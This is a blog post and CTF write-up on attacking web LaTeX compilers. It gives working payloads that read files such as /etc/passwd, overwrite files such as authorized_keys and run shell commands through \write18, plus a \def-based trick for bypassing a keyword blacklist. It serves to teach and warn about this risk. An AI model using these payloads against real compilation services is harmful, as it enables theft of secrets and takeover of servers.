Hacking with LaTeX
In this blogpost I want to outline basic attacks against web based LaTeX compilers. This inspired me to create the Web90 - TexMaker challenge.
TexMaker was a simple website where one could enter LaTeX code and the server would create a PDF file using pdflatex
. You'll find similar services on the internet. Unfortunately, user input should never be trusted and LaTeX code is no exception to this rule.
That's because LaTeX is turing complete and that means that you can write functioning programs with it - I'm still waiting for the first malware written in LaTeX sent as an attachment in phishing mails :)
However, I want to focus on existing ways and possibilities to read, write or execute arbitrary files with LaTeX. This blogpost tries to be an extension to this paper. Some packages like TikZ need to call external programs to work properly. Therefor Pdflatex comes with three operation modes:
-no-shell-escape
Disable the \write18{command} construct, even if it is enabled in the texmf.cnf file.
-shell-restricted
Same as -shell-escape, but limited to a 'safe' set of predefined commands.
-shell-escape
Enable the \write18{command} construct. The command can be any shell command. This construct is normally disallowed for security reasons.
With \write18
you can write to the 18th filedescriptor which is the commandline by default.
You can try all the following examples at papeeria.com. I've notified them of the potential risks and they replied:
Hello Sebastian,
thanks for being pro-active! Yes, we run tex compiler with --shell-escape. However, every compile cycle runs in its own Docker container which is isolated from the host system and from other containers. So, users can do whatever they want, even try to run rm -rf / but the effect of their actions will apply to their one-time container only.
Update (10.03.16, 15:20): I want to clarify that this is not intended to show Papeeria up. I think that their setup with Docker and a non-privileged user is solid. I haven't tried to escape the Docker container, but if you're aware of a way to accomplish this, please email contact [a/t] papeeria dot com.
Reading files
All modes allow arbitrary files to be read from the filesystem. The easiest way is to use \input
:
\input{/etc/passwd}
This will load the contents of the /etc/passwd
file into the PDF file.
If the included file coincidentally ends with .tex
, \include
can be used:
\include{password}
This will include password.tex
from the current working directory.
If the above commands are filtered or blocked by a blacklist, the following workarounds can be used. The first one reads only the first line:
\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file
We create a new \file
handle and open the file /etc/passwd
for reading. Then we read one line into the \line
variable, output it as text (\text
) and close the handle finally.
Usually files have multiple lines and the following code handles that:
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
It loops over all lines until it reaches an EOF
.
What could an attacker do with this?
- Read sensitive files (e.g. SSH private keys, configuration files, ...)
Writing files
Another interesting thing is writing data. This only works if at least the restricted write18
mode is enabled. It can be done with the following set of commands:
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
This writes the string Hello-world
into cmd.tex
.
What could an attacker do with this?
- Delete a files' content by writing nothing to it.
- Overwrite files with foreign data (e.g.
~/.ssh/authorized_keys
)
Executing commands
Let's get to the most interesting part of this blogpost. This only works with write18
enabled, which means that -shell-escape
has to be set.
The most simple way to execute commands is:
\immediate\write18{env}
This runs the env
command.
This, however, will redirect the output to stdout:
(/usr/share/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))engine=pdftex
SELFAUTODIR=/usr
SELFAUTOGRANDPARENT=/
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
SELFAUTOPARENT=/
SELFAUTOLOC=/usr/bin
_=/usr/sbin/env
PWD=/var/www/ctf.internetwache.org.local/compile
LANG=de_DE.UTF8
progname=pdflatex
SHLVL=2
But that won't help us if we don't see the compilation log. A way to work around this limitation is to write stdout to a file and read it again:
\immediate\write18{env > output}
\input{output}
The above env
command will most likely throw an error because the output contains LaTeX special characters:
(/usr/share/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg)) (./test.tex
! Missing $ inserted.
<inserted text>
$
l.7 _
=/usr/sbin/env
?
! Emergency stop.
<inserted text>
$
l.7 _
=/usr/sbin/env
! ==> Fatal error occurred, no output PDF file produced!
A workaround for that is to base64 encode the output:
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
You can use the \input
command to do both steps at once:
\input|ls
or
\input|ls|base64
I don't think that I have to elaborate on how an attacker could do harm by executing commands.
Bypassing blacklists
During the Internetwache CTF 2016, I used the following blacklist:
if(preg_match("(input|include)", $CONTENT)) {
echo 'BLACKLISTED commands used';
} else {
With the newly acquired knowledge you should be able to come up with a bypass. For example this one:
\immediate\write18{ls|base64 > test.txt}
\newread\file
\openin\file=test.txt
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
We write the command's output to test.txt
and read it line-wise.
Okay, cool, but can we bypass the following blacklist?
"(input|include|write18|immediate)"
Yes, we can! We can use \def
to bypass the filter and create a temporary file to read the output:
\def \imm {\string\imme}
\def \diate {diate}
\def \eighteen {\string18}
\def \wwrite {\string\write\eighteen}
\def \args {\string{ls |base64> test.tex\string}}
\def \inp {\string\in}
\def \iput {put}
\def \cmd {\string{test.tex\string}}
% First run
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{\imm\diate\wwrite\args}
\write\outfile{\inp\iput\cmd}
\closeout\outfile
% Second run
\newread\file
\openin\file=cmd.tex
\loop\unless\ifeof\file
\read\file to\fileline
\fileline
\repeat
\closein\file
Run1
This time you need to run the compilation two times:
- First run: Create the
cmd.tex
with the actual exploit code.
cmd.tex
's content:
\immediate\write18{ls |base64> test.tex}
\input{test.tex}
- Second run: Read
cmd.tex
and execute commands.
We can use the fact that \fileline
will execute the actual line from the temporary cmd.tex
file.
If the blacklist does not contain the immediate
keyword, you can use the following block to execute and read the output in one run:
% First run
\newwrite\outfile
\immediate\openout\outfile=cmd.tex
\immediate\write\outfile{\imm\diate\wwrite\args}
\immediate\write\outfile{\inp\iput\cmd}
\immediate\closeout\outfile
Conclusion
This can turn out bad for web based LaTeX compilers as well as for you. Never compile LaTeX code from an untrusted source.
Another thing you should have learned is that blacklists are bad and one will find a bypass eventually.
-=-